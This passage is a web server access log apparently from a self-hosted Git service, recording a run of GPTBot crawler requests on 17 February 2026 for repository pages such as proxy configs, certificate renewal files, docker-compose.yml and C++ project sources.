"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:14:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 1445] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:14:22:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 558466] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main" +[17/Feb/2026:14:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 626449] [Gzip 15.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:23:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 558067] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main" +[17/Feb/2026:14:23:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 10936] [Gzip 3.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:14:23:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 10932] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:14:23:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 10935] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:14:23:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 10935] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:14:23:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 10892] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:14:23:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml" [Client 74.7.227.38] [Length 11815] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" +[17/Feb/2026:14:23:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10515] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" +[17/Feb/2026:14:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10515] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" +[17/Feb/2026:14:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10289] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project" +[17/Feb/2026:14:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10314] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project" +[17/Feb/2026:14:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 10829] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog" +[17/Feb/2026:14:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10399] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project" +[17/Feb/2026:14:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10486] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project" +[17/Feb/2026:14:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" [Client 74.7.227.38] [Length 10702] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" +[17/Feb/2026:14:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 34453] [Gzip 14.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py" +[17/Feb/2026:14:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject" [Client 74.7.227.38] [Length 10710] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project" +[17/Feb/2026:14:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml" [Client 74.7.227.38] [Length 9841] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml" +[17/Feb/2026:14:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml" [Client 74.7.227.38] [Length 11079] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml" +[17/Feb/2026:14:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10858] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm" +[17/Feb/2026:14:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10860] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm" +[17/Feb/2026:14:23:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10721] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm" +[17/Feb/2026:14:23:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10512] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm" +[17/Feb/2026:14:23:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10511] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm" +[17/Feb/2026:14:23:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10695] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm" +[17/Feb/2026:14:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10697] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm" +[17/Feb/2026:14:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10672] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm" +[17/Feb/2026:14:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10162] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject" +[17/Feb/2026:14:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11405] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject" +[17/Feb/2026:14:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11355] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm" +[17/Feb/2026:14:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10401] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp" +[17/Feb/2026:14:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10402] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp" +[17/Feb/2026:14:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp" +[17/Feb/2026:14:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11355] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm" +[17/Feb/2026:14:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11355] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm" +[17/Feb/2026:14:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11356] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm" +[17/Feb/2026:14:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11356] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm" +[17/Feb/2026:14:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject" +[17/Feb/2026:14:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode" +[17/Feb/2026:14:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10421] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10468] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 9878] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll" +[17/Feb/2026:14:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10423] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10420] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10421] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10419] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr 